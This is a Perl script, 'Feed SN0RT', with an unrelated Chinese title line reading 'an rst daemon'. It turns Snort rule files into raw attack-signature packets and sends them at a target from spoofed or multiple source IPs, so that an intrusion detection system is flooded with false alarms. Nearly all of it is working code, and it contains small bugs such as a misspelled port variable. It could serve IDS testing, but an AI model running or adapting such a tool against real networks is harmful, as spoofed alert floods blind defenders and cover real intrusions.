feed_snort.pl

一个rst守护程序

#!/usr/bin/perl
#
# Feed SN0RT
# Version 0.2
#
# Flooding a SN0RT IDS with packets created from
# SN0RT rule files
#
# Programmed by Bastian Ballmann [bytebeater@crazydj.de]
# http://www.crazydj.de
#
# Last Update: 06.11.2002
#
# This code is licensed under the GPL

###[ Loading modules ]###

use Getopt::Std;  # Parsing parameters
use path::config; # Reading configuration
use Net::RawIP;   # Creating packets
use path::hijack; # Hijacking stuff


###[ Config ]###

# HTTP_PORTS
$http_ports = 80;

# ORACLE_PORTS
$oracle_ports = 1521;

# SHELLCODE_PORTS
$shellcode_ports = 22;



###[ MAIN PART ]###

# You are r00t arent you?
if($< != 0)
{
    die "You must have EUID 0 to use this tool!\n\n";
}

# Need help?
if($ARGV[0] eq "--help")
{
    print_usage();
}

if($ARGV[0] eq "--gui")
{
    require "feed_snort-gui.pl";
}
else
{
getopts('vr:s:h:p:w:c:', \%args);
start();
}


###[ Subroutines ]###

# Start the process
sub start
{
# Read a config file
if($args{'c'} ne "")
{
    print "[ Reading config file $args{'c'} ]\n";
    $cfg = config->new();
    %params = $cfg->readcfg($args{'c'});
    $cfg->register_config(%params);
    
    if($params{'rules'} ne "")
    {
	$args{'r'} = $params{'rules'};
    }

    if($params{'http_ports'} ne "")
    {
	$http_ports = $params{'http_ports'};
    }

    if($params{'oracle_ports'} ne "")
    {
	$oracle_ports = $params{'oracle_ports'};
    }

    if($params{'shellcode_ports'} ne "")
    {
	$shellcode_ports = $params{'shellcode_ports'};
    }
}
else
{    
    $cfg = config->new();
    $cfg->check(%args);
}


# No rule files specified?
unless($args{'r'})
{
    print_usage();
    die "\nError: I need some snort rule files...\n\n";
}

# No target?
unless($cfg->target)
{
    print_usage();
    die "Error: What about a target???\n\n";
}

# No  source ip?
# Well attack yaself...
unless($cfg->source)
{
    $cfg->set_source($cfg->get_target);
}

# No default port?
unless($cfg->port)
{
    $cfg->set_port(80);
}

# Parse the rule files, create the packets and
# throw them on the wire
print_about();
feed_snort();
}


# Main subroutine
# Conrol subroutine to parse the rule files,
# create and send the attack packets
sub feed_snort
{
    # Parse a single rule file?
    if(-f $args{'r'})
    {
	parse_rules($args{'r'});
    }

    # Parse a directory of rule files
    elsif(-d $args{'r'})
    {
	opendir(R,$args{'r'}) || die "Error: Cannot read $args{'r'}\n$!\n\n";
	@files = grep {/\.rules$/} readdir(R);
	closedir(R);

	for(@files)
	{
	    parse_rules("$args{'r'}/$_");
	}
    }
    else
    {
	die "Error: Cannot find file or directory $args{'r'}\n\n";
    }

# Multiple source ips?
if($cfg->multisource)
{
    foreach $source (@{$cfg->get_source})
    {
	create_packets($source,$cfg->get_target);
    }
}
else
{
    create_packets($cfg->get_source,$cfg->get_target);
}
    send_packets();
    print "\n[Finished feeting]\n\n";
}


# Subroutine to parse SN0RT rule files
sub parse_rules
{
    my $input = shift;

    if($ARGV[0] eq "--gui")
    {
	$result->insert(end,"[Parsing rule file $input]\n");
	$top->update();
    }
    else
    {
	print "[Parsing rule file $input]\n";
    }

    # Read the rule file
    open(RULESET,"<$input") || die "Error: Cannot read file $input!\n$!\n\n";

    while(<RULESET>)
    {
	$rule_cfg = ();

	# Dont parse comments or empty lines
	if( ($_ =~ /^\s*\#/) || (length($_) < 5) )
	{
	    next;
	}

	# start parsing
	@content = split(/\s/,$_);

	$rule_cfg->{'protocol'} = $content[1];
	
	if( ($content[3] eq "any") || ($content[3] eq "") )
	{
	    $rule_cfg->{'src_port'} = $cfg->get_port;
	}
	elsif($content[3] =~ /HTTP/)
	{
	    $rule_cfg->{'src_port'} = $http_ports;
	}
	elsif($content[3] =~ /ORACLE/)
	{
	    $rule_cfg->{'src_port'} = $orcale_ports;
	}
	elsif($content[3] =~ /SHELLCODE/)
	{
	    $rule_cfg->{'src_port'} = $shellcode_ports;
	}
	else
	{
	    $rule_cfg->{'src_port'} = $content[3];
	}

	if( ($content[6] eq "any") || ($content[6] eq "") )
	{
	    $rule_cfg->{'dst_port'} = $cfg->get_port;
	}
	elsif($content[6] =~ /HTTP/)
	{
	    $rule_cfg->{'dst_port'} = $http_ports;
	}
	elsif($content[6] =~ /ORACLE/)
	{
	    $rule_cfg->{'dst_port'} = $orcale_ports;
	}
	elsif($content[6] =~ /SHELLCODE/)
	{
	    $rule_cfg->{'dst_port'} = $shellcode_ports;
	}
	else
	{
	    $rule_cfg->{'dst_port'} = $content[6];
	}

	chop $rule_cfg->{'src_port'} if $rule_cfg->{'src_port'} =~ /\:$/;
	chop $rule_cfg->{'dst_port'} if $rule_cfg->{'dst_port'} =~ /\:$/;

	# Set default values
	if($rule_cfg->{protocol} eq "tcp")
	{
	    $rule_cfg->{'syn'} = 0;
	    $rule_cfg->{'ack'} = 1;
	    $rule_cfg->{'rst'} = 0;
	    $rule_cfg->{'fin'} = 0;
	    $rule_cfg->{'psh'} = 0;
	    $rule_cfg->{'urg'} = 0;
	}

	$rule_cfg->{ttl} = 64;
	$rule_cfg->{win} = 1024;

	$_ =~ /(.+)\((.+)\)/;
	@packet = split(/\;\s/,$2);

	for(@packet)
	{
	    ($key,$value) = split(/\:/);

	    if($key eq "flags")
	    {
		$rule_cfg->{'syn'} = 1 if $value =~ /S/i;
		$rule_cfg->{'ack'} = 1 if $value =~ /A/i;
		$rule_cfg->{'rst'} = 1 if $value =~ /R/i;		
		$rule_cfg->{'fin'} = 1 if $value =~ /F/i;		
		$rule_cfg->{'psh'} = 1 if $value =~ /P/i;		
		$rule_cfg->{'psh'} = 1 if $value =~ /\+/i;		
		$rule_cfg->{'urg'} = 1 if $value =~ /U/i;		
	    }
	    else
	    {
		$rule_cfg->{$key} = $value;
	    }
	}

	$rule_cfg->{data} =~ /\"(.*)\"/;
	$rule_cfg->{data} = $1;
	$rule_cfg->{uricontent} =~ /\"(.*)\"/;
	$rule_cfg->{data} = $1 if defined $rule_cfg{uricontent};
	$rule_cfg->{spoof} = $cfg->get_source;
	$rule_cfg->{target} = $cfg->get_target;
	push @ruleset, $rule_cfg;
    }

    close(RULESET);
    print "[Found " . scalar(@ruleset) . " rules in file $input]\n";
}


# Create the attack packets
sub create_packets
{
    my $source = shift;
    my $target = shift;

    if($ARGV[0] eq "--gui")
    {
	$result->insert(end,"[Creating packets...]\n");
	$top->update();
    }
    else
    {
	print "[Creating packets...]\n";
    }

    foreach $rule (@ruleset)
    {
	$packet = hijack::create_packet($rule);
	$rule->{'packet'} = $packet;
    }
}


# Throw the packets on the wire
sub send_packets
{
    if($ARGV[0] eq "--gui")
    {
	$result->insert(end,"[Sending packets]\n\n");
	$top->update();
    }

    print "[Sending packets]\n\n";

    foreach $rule (@ruleset)
    {
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,">>> Simulating $rule->{msg} attack to " . $cfg->get_target . "\n");
	}
	else
	{
	    print ">>> Simulating $rule->{msg} attack to " . $cfg->get_target . "\n";
	}

	$packet = $rule->{'packet'};

	if(ref($packet))
	{
	    $packet->send(0,1);
	}

	# Be verbose
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"    $args{'s'}:$rule->{'src_port'} --> $args{'h'}:$rule->{'dst_port'}\n") if $args{'v'};
	    $result->insert(end,"    Flags: SYN $rule->{'syn'} ACK $rule->{'ack'} RST $rule->{'rst'} FIN $rule->{'fin'} PSH $rule->{'psh'} URG $rule->{'urg'}\n") if $args{'v'};
	    $result->insert(end,"    Payload: $rule->{'content'}\n\n") if $args{'v'};
	}
	else
	{
	    print "    $args{'s'}:$rule->{'src_port'} --> $args{'h'}:$rule->{'dst_port'}\n" if $args{'v'};
	    print "    Flags: SYN $rule->{'syn'} ACK $rule->{'ack'} RST $rule->{'rst'} FIN $rule->{'fin'} PSH $rule->{'psh'} URG $rule->{'urg'}\n" if $args{'v'};
	    print "    Payload: $rule->{'content'}\n\n" if $args{'v'};
	}

	# Timer?
	sleep($args{'w'}) if $args{'w'} ne "";
    }
}
	

# Usage
sub print_usage
{
    print_about();
    print "Usage: $0 -r <snort-rulefiles> -s <source-ip> -h <host>\n\n";
    print "-p <n> Default port if keyword any was found in the rule\n";
    print "-w <n> To wait n seconds after sending an attack packet\n";
    print "-h or --help to get this text\n";
    exit(0);
}


# About
sub print_about
{
    print "Feed SN0RT - Programmed by Bytebeater\n";
    print "[ http://www.crazydj.de ]\n";
    print "Version 0.2\n\n";
}
    

###[ Thats the end folks =) ]###